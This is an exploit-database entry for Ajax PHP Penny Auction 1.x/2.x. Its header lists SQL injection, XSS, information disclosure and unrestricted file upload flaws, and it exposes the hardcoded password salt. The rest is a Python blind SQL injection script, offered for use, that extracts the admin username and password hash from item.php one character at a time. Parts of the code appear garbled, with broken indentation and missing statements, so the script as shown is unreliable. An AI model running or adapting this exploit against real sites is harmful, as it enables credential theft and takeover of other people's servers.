Ajax PHP Penny Auction 1.x 2.x – Multiple Vulnerabilities

  • 作者: Taha Hunter
    日期: 2013-08-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/27521/
  • ################################################################################
    #Ajax PHP Penny Auction 1.x 2.x multiple Vulnerabilities #
    # Found by : Taha Hunter #
    #Info :		 #
    # Ajax PHP Penny Auction is one of the most proven and reliable#
    # Penny Auction software options available on the market. Based on a #
    #proprietary AJAX Streaming Engine which has four years of #
    # refinement and debugging under its belt in real live site action.#
    #	 #
    #																			 #
    # website : http://www.ajaxphppennyauction.com/#
    XSS : 
    Phpinfo Information Disclosure :
    Blind SQL Injection :
    #																			 #
    #	 Ajax PHP Penny Auction version 1.x 2.x maybe oders#
    #item.php Blind SQL Injection Exploit 	 #
    #		if you can not beat autoclickers bots ==> hack them ;)	 			 #
    #					Found & Coded by : Taha Hunter							 #
    #				By default there is a table suffix called					 #
    #	PHPAUCTIONXL_ added to all table names you can remove it if its needed #
    #		The Password is likeform md5($salt.$password)			 #
    #the salt is hardcoded in /includes/config.inc.php by default its value is #
    #$MD5_PREFIX = "This_Is_My_Random_String_For_The_MD5_Hash_Algorithm";#
    #																			 #
    #File Upload :															 #
    #if you get the admin password you can upload arbitrary files from 		 #
    #http://[target]/admin/homepage.php there is no check for file extention	 #
    #																			 #
    #MySQL Integer SQLi :	 #
    #http://[target]/admin/userbidhistoryauctions.php?id=65'					 #
    #you must first be logged as admin probably more vulnerablities still there..#
    #																			 #
    #																		 #
    # Usage : python ajaxphpa.py -u http://www.target.com/item.php?id=[a valid id] #
    #																		 #
    #																		 #
    # 		Greetz to : Mehdi,Esac,Issam,Ali,Haitam,Imad and all friends ;)#
    #																		 #
    #																		 #
    #					Contact me : vastmerdown@gmail.com			 #
    #																		 #
    import urllib2
    from threading import Thread
    from time import sleep
    from optparse import OptionParser
    print "#######################################################################"
    print "# #"
    print "#Ajax PHP Penny Auction 1.x 2.x Blind SQL Injection Exploit #"
    print "# #"
    print "# Found & Coded by : Taha Hunter#"
    print "# #"
    print "# Contact me : vastmerdown@gmail.com#"
    print "# #"
    print "#python ajaxphpa.py -u http://www.target.com/item.php?id=[a valid id] #"
    print "# #"
    print "#######################################################################"
    print ""
    print ""
    name = ""
    admin_user = ""
    admin_password = ""
    def valid_test(url,type,val,sig):
    	yep = urllib2.urlopen(url+type+sig+str(val)).read()
    	if keyword in yep:
    		return 1
    		return 0
    def start_guessing(url,type,guess_type):
    		total = 0
    		n_guess = 0
    		fixer = 0
    		max = 255
    		string =""
    		guess = int(max)/2
    		while(total != 9):
    			if(valid_test(url, type,guess, '>')):	
    				fixer = guess
    				n_guess = int(guess + ((max - fixer)/2))
    			if(valid_test(url,type, guess, '<')):
    				max = guess
    				n_guess = int(guess - ((max - fixer)/2))
    			if(valid_test(url, type,guess, '=')):
    				if guess_type == 'len':
    					return guess
    				if guess_type == 'ascii':
    					return chr(guess)
    			guess = n_guess
    			total += 1
    def loader(id,strinng,url,type,guess_type,lenn):
    	strinng[id] =start_guessing(url,type,guess_type)
    keyword = "item_watch.php?add="
    db_len = "%20and%20Length((database()))"
    usage = 'usage: %prog -u http://[target]/item.php?id=[a valid id]'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="url1", help='"http://[target]/item.php?id=1080"')
    (options, args) = parser.parse_args()
    	url = options.url1
    	print "[-] Please insert a valid URL !"
    print "[+] Connecting to site"
    req = urllib2.urlopen(url).read()
    if not keyword in req:
    	print "[-] Please use a valide ID for the link !"
    ''' #If you want to know DB Name
    print "[+] Finding Database Name Length"
    lenn = start_guessing(url,db_len,'len')
    print "[+] DB length is ==> "+str(lenn)
    print "[+] Finding Database Name"
    for a in range(lenn):
    for i in range(1,lenn+1):
    	db_name ="%20and%20ascii(substring((database())%2C"+str(i)+"%2C1))"
    while '1337' in strinng:
    	#print strinng #incomment this line if you want to see progression 
    for i in range(len(strinng)):
    	name += strinng[i]
    print "[+] Database Name is ==> " + name
    un_len = "%20and%20Length((select%20username%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1))"
    pass_len ="%20and%20Length((select%20password%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1))"
    print "[+] Finding Username Length may take a while..."
    lenn = start_guessing(url,un_len,'len')
    print "[+] Done ."
    del strinng[:]
    for a in range(lenn):
    print "[+] Extracting Username may take a while..."
    for i in range(1,lenn+1):
    	username = "%20and%20ascii(substring((select%20username%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1)%2C"+str(i)+"%2C1))"
    while '1337' in strinng:
    	#print strinng # incomment this line if you want to see progression 
    for i in range(len(strinng)):
    	admin_user += strinng[i]
    print "[+] Found ! Username is ==> " +admin_user
    print "[+] Finding Password Length may take a while..."
    lenn = start_guessing(url,pass_len,'len')
    print "[+] Done ."
    del strinng[:]
    for a in range(lenn):
    print "[+] Extracting Password may take a while..."
    for i in range(1,lenn+1):
    	password = "%20and%20ascii(substring((select%20password%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1)%2C"+str(i)+"%2C1))"
    while '1337' in strinng:
    	#print strinng #incomment this line if you want to see progression 
    for i in range(len(strinng)):
    	admin_password += strinng[i]
    print "[+] Found ! Password is ==> " +admin_password
    print "[+] Username => "+admin_user+" Password : => "+admin_password
    print "[+] Done Enjoy !"